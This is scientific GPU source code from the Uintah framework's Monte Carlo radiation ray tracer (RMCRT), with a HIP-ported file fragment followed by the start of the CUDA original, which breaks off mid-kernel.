(1.0/4294967295.0); #endif } //______________________________________________________________________ // Returns random number between 0 & 1.0 excluding 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblExcDevice(hiprandState_t* globalState) { int tid = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; hiprandState_t localState = globalState[tid]; double val = hiprand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return ( (double)val + 0.5 ) * (1.0/4294967296.0); #endif } //______________________________________________________________________ // Returns random integer in [0,n] // rnd_integer_from_A_to_B = A + hiprand() * (B-A); // A = 0 //______________________________________________________________________ __device__ int randIntDevice(hiprandState_t* globalState, const int B ) { double val = randDblDevice( globalState ); return val * B; } //______________________________________________________________________ // Each thread gets same seed, a different sequence number, no offset // This will create repeatable results. __device__ void setupRandNumsSeedAndSequences(hiprandState_t* randNumStates, int numStates, unsigned long long patchID, unsigned long long curTimeStep) { // Generate random numbers using hiprand_init(). // Format is hiprand_init(seed, sequence, offset, state); // Note, it seems a very large sequence really slows things down (bits in the high order region) // I measured kernels taking an additional 300 milliseconds due to it! So the sequence is kept // small, using lower order bits only, and intead the seed is given a number with bits in both the // high order and low order regions. // Unfortunately this isn't perfect. "Sequences generated with different seeds // usually do not have statistically correlated values, but some choices of seeds may give // statistically correlated sequences. Sequences generated with the same seed and different // sequence numbers will not have statistically correlated values." from here: // http://docs.nvidia.com/cuda/hiprand/device-api-overview.html#axzz4SPy8xMuj // For RMCRT we will take the tradeoff of possibly having statistically correlated values over // the 300 millisecond hit. // Generate what should be a unique seed. To get a unique number the code below computes a tID // which is a combination of a patchID, threadID, and the current timestep. // This uses the left 20 bits from the patchID, the next 20 bits from the curTimeStep // and the last 24 bits from the indexId. Combined that should be unique. //Standard CUDA way of computing a threadID int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int threadId = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; unsigned long long tID = (((patchID & 0xFFFFF) << 44) | ((curTimeStep& 0xFFFFF) << 24) | (threadId & 0xFFFFFF)); hiprand_init(tID, threadId, 0, &randNumStates[threadId]); //If you want to take the 300 millisecond hit, use this line below instead. //hiprand_init(1234, tID, 0, &randNumStates[threadId]); } //______________________________________________________________________ // is cell a debug cell __device__ bool isDbgCellDevice( GPUIntVector me ) { int size = 2; GPUIntVector dbgCell[2]; dbgCell[0] = make_int3(0,0,0); dbgCell[1] = make_int3(5,5,5); for (int i = 0; i < size; i++) { if( me == dbgCell[i]){ return true; } } return false; } //______________________________________________________________________ // //Math.h has an std::isnan and std::isinf. CUDA has an isnan and isinf macro (not in a namespace, and not a function) //This .cu file sees both, so trying to use the CUDA isnan gives compiler ambiguity errors. //Dan Sutherland with Sandia said they solved this problem by using their own isnan and isinf //So here is the code for that. They're also renamed to isNan and isInf to keep things separate. //(Code was found at http://stackoverflow.com/questions/2249110/how-do-i-make-a-portable-isnan-isinf-function //and adapted from https://github.com/Itseez/opencv/blob/3.0.0/modules/hal/include/opencv2/hal/defs.h#L447 ) typedef unsigned long long uint64; __device__ int isInf(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) == 0x7ff00000 && ( (unsigned)ieee754.u == 0 ); } __device__ int isNan(double x) { union { uint64 u; double f; } ieee754; ieee754.f = x; return ( (unsigned)(ieee754.u >> 32) & 0x7fffffff ) + ( (unsigned)ieee754.u != 0 ) > 0x7ff00000; } __device__ int isInf( float value ) { union { uint64 u; double f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) == 0x7f800000; } __device__ int isNan( float value ) { union { uint64 u; double f; } ieee754; ieee754.f = value; return (ieee754.u & 0x7fffffff) > 0x7f800000; } //______________________________________________________________________ // Perform some sanity checks on the Variable. This is for debugging template< class T> __device__ void GPUVariableSanityCK(const GPUGridVariable<T>& Q, const GPUIntVector Lo, const GPUIntVector Hi) { #if SCI_ASSERTION_LEVEL > 0 if (isThread0()) { GPUIntVector varLo = Q.getLowIndex(); GPUIntVector varHi = Q.getHighIndex(); if( Lo < varLo || varHi < Hi){ printf ( "ERROR: GPUVariableSanityCK \n"); printf(" Variable: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", varLo.x, varLo.y, varLo.z, varHi.x, varHi.y, varHi.z); printf(" Requested extents: varLo:[%i,%i,%i], varHi[%i,%i,%i]\n", Lo.x, Lo.y, Lo.z, Hi.x, Hi.y, Hi.z); printf(" Now existing..."); __threadfence(); asm("trap;"); } for (int i = Lo.x; i < Hi.x; i++) { for (int j = Lo.y; j < Hi.y; j++) { for (int k = Lo.z; k < Hi.z; k++) { GPUIntVector idx = make_int3(i, j, k); T me = Q[idx]; if ( isNan(me) || isInf(me)){ printf ( "isNan or isInf was detected at [%i,%i,%i]\n", i,j,k); printf(" Now existing..."); __threadfence(); asm("trap;"); } } // k loop } // j loop } // i loop } // thread0 #endif } template __device__ void GPUVariableSanityCK(const GPUGridVariable<float>& Q, const GPUIntVector Lo, const GPUIntVector Hi); template __device__ void GPUVariableSanityCK(const GPUGridVariable<double>& Q, const GPUIntVector Lo, const GPUIntVector Hi); //______________________________________________________________________ // template< class T> __host__ void launchRayTraceKernel(DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw) { // setup random number generator states on the device, 1 for each thread hiprandState_t* randNumStates; int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; randNumStates = (hiprandState_t*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(hiprandState_t)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); //Create a host array, load it with data, and send it over to the GPU int nRandNums = 512; double* d_debugRandNums; size_t randNumsByteSize = nRandNums * sizeof(double); d_debugRandNums = (double*)GPUMemoryPool::allocateCudaSpaceFromPool(0, randNumsByteSize); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, d_debugRandNums); //Making sure we have kernel/mem copy overlapping double* h_debugRandNums = new double[nRandNums]; hipHostRegister(h_debugRandNums, randNumsByteSize, hipHostRegisterPortable); //perform computations here on h_debugRandNums for (int i = 0; i < nRandNums; i++) { h_debugRandNums[i] = i; } dtask->addTempHostMemoryToBeFreedOnCompletion(h_debugRandNums); hipMemcpyAsync(d_debugRandNums, h_debugRandNums, randNumsByteSize, hipMemcpyHostToDevice, *stream ); hipLaunchKernelGGL(( rayTraceKernel< T >), dim3(dimGrid), dim3(dimBlock), 0, *stream , dimGrid, dimBlock, matlIndx, level, patch, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); #if DEBUG > 0 hipDeviceSynchronize(); // so printF will work #endif } //______________________________________________________________________ // template< class T> __host__ void launchRayTraceDataOnionKernel( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // copy regionLo & regionHi to device memory int maxLevels = gridP.maxLevels; int3* dev_regionLo; int3* dev_regionHi; size_t size = d_MAXLEVELS * sizeof(int3); dev_regionLo = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dev_regionHi = (int3*)GPUMemoryPool::allocateCudaSpaceFromPool(0, size); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionLo); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, dev_regionHi); //More GPU stuff to allow kernel/copy overlapping int3 * myLo = new int3[d_MAXLEVELS]; hipHostRegister(myLo, sizeof(int3) * d_MAXLEVELS, hipHostRegisterPortable); int3 * myHi = new int3[d_MAXLEVELS]; hipHostRegister(myHi, sizeof(int3) * d_MAXLEVELS, hipHostRegisterPortable); dtask->addTempHostMemoryToBeFreedOnCompletion(myLo); dtask->addTempHostMemoryToBeFreedOnCompletion(myHi); for (int l = 0; l < maxLevels; ++l) { myLo[l] = levelP[l].regionLo; // never use levelP regionLo or hi in the kernel. myHi[l] = levelP[l].regionHi; // They are different on each patch } CUDA_RT_SAFE_CALL( hipMemcpyAsync( dev_regionLo, myLo, size, hipMemcpyHostToDevice, *stream) ); CUDA_RT_SAFE_CALL( hipMemcpyAsync( dev_regionHi, myHi, size, hipMemcpyHostToDevice, *stream) ); //__________________________________ // copy levelParams array to constant memory on device CUDA_RT_SAFE_CALL(hipMemcpyToSymbolAsync(d_levels, levelP, (maxLevels * sizeof(levelParams)),0, hipMemcpyHostToDevice,*stream)); //__________________________________ // setup random number generator states on the device, 1 for each thread int numStates = dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z; hiprandState_t* randNumStates; randNumStates = (hiprandState_t*)GPUMemoryPool::allocateCudaSpaceFromPool(0, numStates * sizeof(hiprandState_t)); dtask->addTempCudaMemoryToBeFreedOnCompletion(0, randNumStates); hipLaunchKernelGGL(( rayTraceDataOnionKernel< T >), dim3(dimGrid), dim3(dimBlock), 0, *stream , dimGrid, dimBlock, matlIndex, patch, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, dev_regionLo, dev_regionHi, randNumStates, RT_flags, curTimeStep, abskg_gdw, sigmaT4_gdw, cellType_gdw, old_gdw, new_gdw); //hipDeviceSynchronize(); //hipError_t result = hipPeekAtLastError(); //printf("After the error code for patch %d was %d\n", patch.ID, result); #if DEBUG > 0 hipDeviceSynchronize(); #endif } //______________________________________________________________________ // Explicit template instantiations template __host__ void launchRayTraceKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, const int matlIndx, levelParams level, patchParams patch, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* celltype_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<double>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); //______________________________________________________________________ // template __host__ void launchRayTraceDataOnionKernel<float>( DetailedTask* dtask, dim3 dimGrid, dim3 dimBlock, int matlIndex, patchParams patch, gridParams gridP, levelParams* levelP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, hipStream_t* stream, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ); } //end namespace Uintah
4af0e54c4c3497c17d9e89041e6ff7533ac12d13.cu
/* * The MIT License * * Copyright (c) 1997-2018 The University of Utah * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include <CCA/Components/Models/Radiation/RMCRT/RayGPU.cuh> #include <CCA/Components/Schedulers/GPUDataWarehouse.h> #include <CCA/Components/Schedulers/GPUMemoryPool.h> #include <CCA/Components/Schedulers/DetailedTasks.h> #include <Core/Grid/Variables/GPUGridVariable.h> #include <Core/Grid/Variables/GPUStencil7.h> #include <Core/Grid/Variables/Stencil7.h> #include <Core/Util/GPU.h> #include <sci_defs/cuda_defs.h> #include <sci_defs/uintah_defs.h> #include <curand.h> #include <curand_kernel.h> #define __CUDA_INTERNAL_COMPILATION__ #include "math_functions.h" // needed for max() #undef __CUDA_INTERNAL_COMPILATION__ #define DEBUG -9 // 1: divQ, 2: boundFlux, 3: scattering //#define FIXED_RANDOM_NUM // also edit in src/Core/Math/MersenneTwister.h to compare with Ray:CPU #define FIXED_RAY_DIR -9 // Sets ray direction. 1: (0.7071,0.7071, 0), 2: (0.7071, 0, 0.7071), 3: (0, 0.7071, 0.7071) // 4: (0.7071, 0.7071, 7071), 5: (1,0,0) 6: (0, 1, 0), 7: (0,0,1) #define SIGN 1 // Multiply the FIXED_RAY_DIRs by value //__________________________________ // To Do // - Investigate using multiple GPUs per node. // - Implement fixed and dynamic ROI. // - dynamic block size? // - Implement labelNames in unified memory. // - investigate the performance with different patch configurations // - deterministic random numbers // - Ray steps //__________________________________ // // To use cuda-gdb on a single GPU you must set the environmental variable // CUDA_DEBUGGER_SOFTWARE_PREEMPTION=1 // // mpirun -np 1 xterm -e cuda-gdb sus -gpu -nthreads 2 <args> //__________________________________ namespace Uintah { //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer kernel //--------------------------------------------------------------------------- template< class T> __global__ void rayTraceKernel( dim3 dimGrid, dim3 dimBlock, const int matl, levelParams level, patchParams patch, curandState* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { // Not used right now // int blockID = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; // int threadID = threadIdx.x + blockDim.x * threadIdx.y + (blockDim.x * blockDim.y) * threadIdx.z; // calculate the thread indices int tidX = threadIdx.x + blockIdx.x * blockDim.x + patch.loEC.x; int tidY = threadIdx.y + blockIdx.y * blockDim.y + patch.loEC.y; const GPUGridVariable< T > sigmaT4OverPi; const GPUGridVariable< T > abskg; // Need to use getRegion() to get the data const GPUGridVariable<int> cellType; GPUGridVariable<double> divQ; GPUGridVariable<GPUStencil7> boundFlux; GPUGridVariable<double> radiationVolQ; // sigmaT4_gdw->print(); sigmaT4_gdw->getLevel( sigmaT4OverPi, "sigmaT4", matl, level.index); cellType_gdw->getLevel( cellType, "cellType", matl, level.index); if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg, "abskgRMCRT", matl, level.index); }else{ abskg_gdw->getLevel( abskg, "abskg", matl, level.index); } if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ, "divQ", patch.ID, matl ); new_gdw->getModifiable( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->getModifiable( radiationVolQ,"radiationVolq", patch.ID, matl ); }else{ new_gdw->get( divQ, "divQ", patch.ID, matl ); // these should be allocateAndPut() calls new_gdw->get( boundFlux, "RMCRTboundFlux", patch.ID, matl ); new_gdw->get( radiationVolQ,"radiationVolq", patch.ID, matl ); // Extra Cell Loop if ( (tidX >= patch.loEC.x) && (tidY >= patch.loEC.y) && (tidX < patch.hiEC.x) && (tidY < patch.hiEC.y) ) { // patch boundary check #pragma unroll for (int z = patch.loEC.z; z < patch.hiEC.z; z++) { // loop through z slices GPUIntVector c = make_int3(tidX, tidY, z); divQ[c] = 0.0; radiationVolQ[c] = 0.0; boundFlux[c].initialize(0.0); } } } //__________________________________ // Sanity checks #if 0 if (isThread0()) { printf(" GPUVariable Sanity check level: %i, patch: %i \n",level.index, patch.ID); } #endif GPUVariableSanityCK(abskg, patch.loEC, patch.hiEC); GPUVariableSanityCK(sigmaT4OverPi, patch.loEC, patch.hiEC); bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme const int size = 1000; int rand_i[ size ]; //Give it a buffer room of 1000. But we should only use nFluxRays items in it. //Hopefully this 1000 will always be greater than nFluxRays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) and computation time (don't need to compute //the rays twice) if (nFluxRays > size) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. nFluxRays is %d, size of the array is.%d\n\n\n", nFluxRays, size); //We have to return, otherwise the upcoming math in rayDirectionHyperCube_cellFaceDevice will generate nan values. return; } //______________________________________________________________________ // R A D I O M E T E R //______________________________________________________________________ // TO BE FILLED IN //______________________________________________________________________ // B O U N D A R Y F L U X //______________________________________________________________________ setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveBoundaryFlux ){ __shared__ int3 dirIndexOrder[6]; __shared__ int3 dirSignSwap[6]; //_____________________________________________ // Ordering for Surface Method // This block of code is used to properly place ray origins, and orient ray directions // onto the correct face. This is necessary, because by default, the rays are placed // and oriented onto a default face, then require adjustment onto the proper face. dirIndexOrder[EAST] = make_int3(2, 1, 0); dirIndexOrder[WEST] = make_int3(2, 1, 0); dirIndexOrder[NORTH] = make_int3(0, 2, 1); dirIndexOrder[SOUTH] = make_int3(0, 2, 1); dirIndexOrder[TOP] = make_int3(0, 1, 2); dirIndexOrder[BOT] = make_int3(0, 1, 2); // Ordering is slightly different from 6Flux since here, rays pass through origin cell from the inside faces. dirSignSwap[EAST] = make_int3(-1, 1, 1); dirSignSwap[WEST] = make_int3( 1, 1, 1); dirSignSwap[NORTH] = make_int3( 1, -1, 1); dirSignSwap[SOUTH] = make_int3( 1, 1, 1); dirSignSwap[TOP] = make_int3( 1, 1, -1); dirSignSwap[BOT] = make_int3( 1, 1, 1); __syncthreads(); //__________________________________ // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //get a new set of random numbers if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } boundFlux[origin].initialize(0.0); BoundaryFaces boundaryFaces; // which surrounding cells are boundaries boundFlux[origin].p = has_a_boundaryDevice(origin, cellType, boundaryFaces); GPUPoint CC_pos = level.getCellPosition(origin); //__________________________________ // Loop over boundary faces of the cell and compute incident radiative flux #pragma unroll for( int i = 0; i<boundaryFaces.size(); i++) { int RayFace = boundaryFaces.faceArray[i]; int UintahFace[6] = {WEST,EAST,SOUTH,NORTH,BOT,TOP}; double sumI = 0; double sumProjI = 0; double sumI_prev = 0; double sumCosTheta = 0; // used to force sumCosTheta/nRays == 0.5 or sum (d_Omega * cosTheta) == pi //__________________________________ // Flux ray loop #pragma unroll for (int iRay=0; iRay < nFluxRays; iRay++){ GPUVector direction_vector; GPUVector rayOrigin; double cosTheta; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling rayDirectionHyperCube_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta, rand_i[iRay], iRay, nFluxRays); } else { rayDirection_cellFaceDevice( randNumStates, origin, dirIndexOrder[RayFace], dirSignSwap[RayFace], iRay, direction_vector, cosTheta ); } rayLocation_cellFaceDevice( randNumStates, RayFace, patch.dx, CC_pos, rayOrigin); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); sumProjI += cosTheta * (sumI - sumI_prev); // must subtract sumI_prev, since sumI accumulates intensity sumCosTheta += cosTheta; sumI_prev = sumI; } // end of flux ray loop sumProjI = sumProjI * (double) nFluxRays/sumCosTheta/2.0; // This operation corrects for error in the first moment over a // half range of the solid angle (Modest Radiative Heat Transfer page 545 1st edition) //__________________________________ // Compute Net Flux to the boundary int face = UintahFace[RayFace]; boundFlux[origin][ face ] = sumProjI * 2 *M_PI/(double)nFluxRays; #if ( DEBUG == 2 ) if( isDbgCellDevice(origin) ) { printf( "\n [%d, %d, %d] face: %d sumProjI: %g BoundaryFlux: %g\n", origin.x, origin.y, origin.z, face, sumProjI, boundFlux[origin][ face ]); } #endif } // boundary faces loop } // z slices loop } // X-Y Thread loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ //Setup the original seeds so we can get the same random numbers again. setupRandNumsSeedAndSequences(randNumStates, (dimGrid.x * dimGrid.y * dimGrid.z * dimBlock.x * dimBlock.y * dimBlock.z), patch.ID, curTimeStep); if( RT_flags.solveDivQ ){ const int nDivQRays = RT_flags.nDivQRays; // for readability // GPU equivalent of GridIterator loop - calculate sets of rays per thread if ( (tidX >= patch.lo.x) && (tidY >= patch.lo.y) && (tidX < patch.hi.x) && (tidY < patch.hi.y) ) { // patch boundary check #pragma unroll for (int z = patch.lo.z; z < patch.hi.z; z++) { // loop through z slices GPUIntVector origin = make_int3(tidX, tidY, z); // for each thread //Get the same set of random numbers as we had before. We need the same rays. if (doLatinHyperCube){ randVectorDevice(rand_i, nFluxRays, randNumStates); } double sumI = 0; GPUPoint CC_pos = level.getCellPosition(origin); // don't compute in intrusions and walls if( cellType[origin] != d_flowCell ){ continue; } //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < nDivQRays; iRay++) { GPUVector direction_vector; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling direction_vector = findRayDirectionHyperCubeDevice(randNumStates, nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling direction_vector = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, patch.dx, RT_flags.CCRays ); updateSumIDevice< T >( level, direction_vector, rayOrigin, origin, patch.dx, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ[origin] = -4.0 * M_PI * abskg[origin] * ( sigmaT4OverPi[origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ[origin] = 4.0 * M_PI * abskg[origin] * (sumI/RT_flags.nDivQRays) ; #if ( DEBUG == 1) if( isDbgCellDevice( origin ) ){ printf( "\n [%d, %d, %d] sumI: %1.16e divQ: %1.16e radiationVolq: %1.16e abskg: %1.16e, sigmaT4: %1.16e \n", origin.x, origin.y, origin.z, sumI,divQ[origin], radiationVolQ[origin],abskg[origin], sigmaT4OverPi[origin]); } #endif } // end z-slice loop } // end domain boundary check } // solve divQ } // end ray trace kernel //--------------------------------------------------------------------------- // Kernel: The GPU ray tracer data onion kernel //--------------------------------------------------------------------------- // hard-wired for 2-levels now, but this should be fast and fixes __constant__ levelParams d_levels[d_MAXLEVELS]; template< class T> __global__ #if NDEBUG //Uinth has a DNDEBUG compiler defined flag in normal trunk builds. Debug builds have no compiler flags we can capture. __launch_bounds__(640, 1) // For 96 registers with 320 threads. Allows two kernels to fit within an SM. // Seems to be the performance sweet spot in release mode. #endif void rayTraceDataOnionKernel( dim3 dimGrid, dim3 dimBlock, int matl, patchParams finePatch, gridParams gridP, GPUIntVector fineLevel_ROI_Lo, GPUIntVector fineLevel_ROI_Hi, int3* regionLo, int3* regionHi, curandState* randNumStates, RMCRT_flags RT_flags, int curTimeStep, GPUDataWarehouse* abskg_gdw, GPUDataWarehouse* sigmaT4_gdw, GPUDataWarehouse* cellType_gdw, GPUDataWarehouse* old_gdw, GPUDataWarehouse* new_gdw ) { #if 0 if (tidX == 1 && tidY == 1) { printf("\nGPU levelParams\n"); printf("Level-0 "); d_levels[0].print(); printf("Level-1 "); d_levels[1].print(); } #endif int maxLevels = gridP.maxLevels; int fineL = maxLevels - 1; levelParams fineLevel = d_levels[fineL]; //compute startCell and endCell relative to the block int startCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * blockIdx.x; int endCell = RT_flags.startCell + ((RT_flags.endCell - RT_flags.startCell) / gridDim.x) * (blockIdx.x + 1); RT_flags.startCell = startCell; RT_flags.endCell = endCell; //__________________________________ // const GPUGridVariable<T> abskg[d_MAXLEVELS]; const GPUGridVariable<T> sigmaT4OverPi[d_MAXLEVELS]; const GPUGridVariable<int> cellType[d_MAXLEVELS]; // new_gdw->print(); //__________________________________ // coarse level data for the entire level for (int l = 0; l < maxLevels; ++l) { if (d_levels[l].hasFinerLevel) { if(RT_flags.usingFloats){ abskg_gdw->getLevel( abskg[l], "abskgRMCRT", matl, l); } else { abskg_gdw->getLevel( abskg[l], "abskg", matl, l); } sigmaT4_gdw->getLevel( sigmaT4OverPi[l], "sigmaT4", matl, l); cellType_gdw->getLevel( cellType[l], "cellType", matl, l); GPUVariableSanityCK(abskg[l], d_levels[l].regionLo,d_levels[l].regionHi); GPUVariableSanityCK(sigmaT4OverPi[l],d_levels[l].regionLo,d_levels[l].regionHi); } } //__________________________________ // fine level data for the region of interest. // ToDo: replace get with getRegion() calls so // so the halo can be > 0 if ( RT_flags.whichROI_algo == patch_based ) { if(RT_flags.usingFloats){ abskg_gdw->get(abskg[fineL], "abskgRMCRT", finePatch.ID, matl, fineL); } else { abskg_gdw->get(abskg[fineL], "abskg", finePatch.ID, matl, fineL); } sigmaT4_gdw->get(sigmaT4OverPi[fineL], "sigmaT4", finePatch.ID, matl, fineL); cellType_gdw->get(cellType[fineL], "cellType", finePatch.ID, matl, fineL); GPUVariableSanityCK(abskg[fineL], fineLevel_ROI_Lo,fineLevel_ROI_Hi); GPUVariableSanityCK(sigmaT4OverPi[fineL],fineLevel_ROI_Lo,fineLevel_ROI_Hi); } GPUGridVariable<double> divQ_fine; GPUGridVariable<GPUStencil7> boundFlux_fine; GPUGridVariable<double> radiationVolQ_fine; //__________________________________ // fine level data for this patch if( RT_flags.modifies_divQ ){ new_gdw->getModifiable( divQ_fine, "divQ", finePatch.ID, matl, fineL ); new_gdw->getModifiable( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->getModifiable( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); }else{ new_gdw->get( divQ_fine, "divQ", finePatch.ID, matl, fineL ); // these should be allocateAntPut() calls new_gdw->get( boundFlux_fine, "RMCRTboundFlux", finePatch.ID, matl, fineL ); new_gdw->get( radiationVolQ_fine,"radiationVolq", finePatch.ID, matl, fineL ); //__________________________________ // initialize Extra Cell Loop int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector c = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { divQ_fine[c] = 0.0; radiationVolQ_fine[c] = 0.0; boundFlux_fine[c].initialize(0.0); //move to the next cell threadID += blockDim.x; c.x = (threadID % finePatchSize.x) + finePatch.lo.x; c.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; c.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } } //We're going to change thread to cell mappings, so make sure all vars have been initialized before continuing __syncthreads(); //__________________________________ // bool doLatinHyperCube = (RT_flags.rayDirSampleAlgo == LATIN_HYPER_CUBE); const int nFluxRays = RT_flags.nFluxRays; // for readability // This rand_i array is only needed for LATIN_HYPER_CUBE scheme //const int size = 500; int rand_i[ d_MAX_RAYS ]; //Give it a buffer room for many rays. //Hopefully this 500 will always be greater than the number of rays. //TODO, a 4D array is probably better here (x,y,z, ray#), saves //on memory (no unused buffer) if (nFluxRays > d_MAX_RAYS || RT_flags.nDivQRays > d_MAX_RAYS) { printf("\n\n\nERROR! rayTraceKernel() - Cannot have more rays than the rand_i array size. Flux rays: %d, divQ rays: 